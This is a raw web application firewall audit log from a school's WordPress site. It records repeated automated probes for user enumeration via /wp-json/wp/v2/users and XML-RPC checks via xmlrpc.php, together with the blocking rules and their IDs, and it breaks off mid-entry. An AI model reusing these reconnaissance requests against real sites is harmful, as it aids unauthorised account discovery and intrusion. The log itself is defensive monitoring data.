Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7481373-Z-- --5b469613-A-- [10/May/2025:08:26:03 +0700] aB6rK8i6w7GTj2w44Z6cDgAAAMc 103.236.140.4 53568 103.236.140.4 8181 --5b469613-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b469613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b469613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840363978620 2877 (- - -) Stopwatch2: 1746840363978620 2877; combined=1270, p1=431, p2=808, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b469613-Z-- --cac4c978-A-- [10/May/2025:08:26:06 +0700] aB6rLsi6w7GTj2w44Z6cDwAAAMY 103.236.140.4 53574 103.236.140.4 8181 --cac4c978-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cac4c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cac4c978-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840366716256 2178 (- - -) Stopwatch2: 1746840366716256 2178; combined=996, p1=308, p2=661, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cac4c978-Z-- --74fa0c37-A-- [10/May/2025:08:26:09 +0700] aB6rMci6w7GTj2w44Z6cEgAAAM0 103.236.140.4 53580 103.236.140.4 8181 --74fa0c37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74fa0c37-C-- demo.sayHello --74fa0c37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74fa0c37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840369618101 4575 (- - -) Stopwatch2: 1746840369618101 4575; combined=3717, p1=440, p2=2894, p3=24, p4=27, p5=185, sr=73, sw=147, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74fa0c37-Z-- --3f07356e-A-- [10/May/2025:08:26:13 +0700] aB6rNci6w7GTj2w44Z6cEwAAAMs 103.236.140.4 53582 103.236.140.4 8181 --3f07356e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f07356e-C-- demo.sayHello --3f07356e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f07356e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840373706008 6806 (- - -) Stopwatch2: 1746840373706008 6806; combined=4855, p1=623, p2=3974, p3=45, p4=43, p5=100, sr=87, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f07356e-Z-- --51b6ee51-A-- [10/May/2025:08:26:17 +0700] aB6rOci6w7GTj2w44Z6cFAAAANA 103.236.140.4 53586 103.236.140.4 8181 --51b6ee51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --51b6ee51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51b6ee51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840377315151 2254 (- - -) Stopwatch2: 1746840377315151 2254; combined=1054, p1=399, p2=629, p3=0, p4=0, p5=26, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51b6ee51-Z-- --58396155-A-- [10/May/2025:08:26:22 +0700] aB6rPtr9PbfRBMhzxmRayQAAAEw 103.236.140.4 53592 103.236.140.4 8181 --58396155-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58396155-C-- demo.sayHello --58396155-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58396155-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840382307783 5561 (- - -) Stopwatch2: 1746840382307783 5561; combined=4094, p1=565, p2=3312, p3=31, p4=35, p5=90, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58396155-Z-- --ed6b921d-A-- [10/May/2025:08:27:58 +0700] aB6rnsi6w7GTj2w44Z6cFwAAANM 103.236.140.4 53606 103.236.140.4 8181 --ed6b921d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed6b921d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed6b921d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840478922676 2858 (- - -) Stopwatch2: 1746840478922676 2858; combined=1286, p1=428, p2=815, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6b921d-Z-- --e4129a01-A-- [10/May/2025:08:28:09 +0700] aB6rqci6w7GTj2w44Z6cGQAAANE 103.236.140.4 53610 103.236.140.4 8181 --e4129a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4129a01-C-- demo.sayHello --e4129a01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4129a01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840489158646 5001 (- - -) Stopwatch2: 1746840489158646 5001; combined=3840, p1=464, p2=3166, p3=27, p4=29, p5=91, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4129a01-Z-- --303f283a-A-- [10/May/2025:08:28:56 +0700] aB6r2Mi6w7GTj2w44Z6cHgAAAMU 103.236.140.4 53628 103.236.140.4 8181 --303f283a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --303f283a-C-- demo.sayHello --303f283a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --303f283a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840536825188 5509 (- - -) Stopwatch2: 1746840536825188 5509; combined=4151, p1=507, p2=3373, p3=27, p4=33, p5=120, sr=70, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303f283a-Z-- --3440374e-A-- [10/May/2025:08:29:09 +0700] aB6r5auC4AqLGUOyzyX70QAAAJg 103.236.140.4 53632 103.236.140.4 8181 --3440374e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3440374e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3440374e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840549943962 3485 (- - -) Stopwatch2: 1746840549943962 3485; combined=1537, p1=547, p2=952, p3=0, p4=0, p5=37, sr=141, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3440374e-Z-- --b7e9182c-A-- [10/May/2025:08:29:14 +0700] aB6r6quC4AqLGUOyzyX70gAAAIA 103.236.140.4 53636 103.236.140.4 8181 --b7e9182c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b7e9182c-C-- demo.sayHello --b7e9182c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7e9182c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840554681516 5720 (- - -) Stopwatch2: 1746840554681516 5720; combined=4242, p1=551, p2=3475, p3=31, p4=34, p5=90, sr=80, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7e9182c-Z-- --3f032745-A-- [10/May/2025:08:30:21 +0700] aB6sLRLuBiaF9R054QBa1wAAAA4 103.236.140.4 53642 103.236.140.4 8181 --3f032745-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f032745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f032745-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840621179357 2891 (- - -) Stopwatch2: 1746840621179357 2891; combined=1240, p1=431, p2=778, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f032745-Z-- --9a5c7c62-A-- [10/May/2025:08:30:27 +0700] aB6sM6uC4AqLGUOyzyX70wAAAIM 103.236.140.4 53648 103.236.140.4 8181 --9a5c7c62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a5c7c62-C-- demo.sayHello --9a5c7c62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5c7c62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840627756469 5676 (- - -) Stopwatch2: 1746840627756469 5676; combined=4117, p1=577, p2=3383, p3=22, p4=25, p5=65, sr=126, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5c7c62-Z-- --d21c5f20-A-- [10/May/2025:08:30:29 +0700] aB6sNauC4AqLGUOyzyX71AAAAIQ 103.236.140.4 53650 103.236.140.4 8181 --d21c5f20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d21c5f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d21c5f20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840629594430 2484 (- - -) Stopwatch2: 1746840629594430 2484; combined=1152, p1=417, p2=707, p3=0, p4=0, p5=27, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d21c5f20-Z-- --6369c327-A-- [10/May/2025:08:30:35 +0700] aB6sO8i6w7GTj2w44Z6cIAAAAMo 103.236.140.4 53656 103.236.140.4 8181 --6369c327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6369c327-C-- demo.sayHello --6369c327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6369c327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840635558494 4708 (- - -) Stopwatch2: 1746840635558494 4708; combined=3635, p1=443, p2=2990, p3=26, p4=27, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6369c327-Z-- --3fa49533-A-- [10/May/2025:08:31:34 +0700] aB6sdhLuBiaF9R054QBa2wAAABY 103.236.140.4 53666 103.236.140.4 8181 --3fa49533-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.19.135.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.19.135.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3fa49533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fa49533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840694019644 3432 (- - -) Stopwatch2: 1746840694019644 3432; combined=1544, p1=557, p2=955, p3=0, p4=0, p5=32, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fa49533-Z-- --999fd026-A-- [10/May/2025:08:31:51 +0700] aB6shxLuBiaF9R054QBa3QAAAAA 103.236.140.4 53672 103.236.140.4 8181 --999fd026-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --999fd026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --999fd026-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 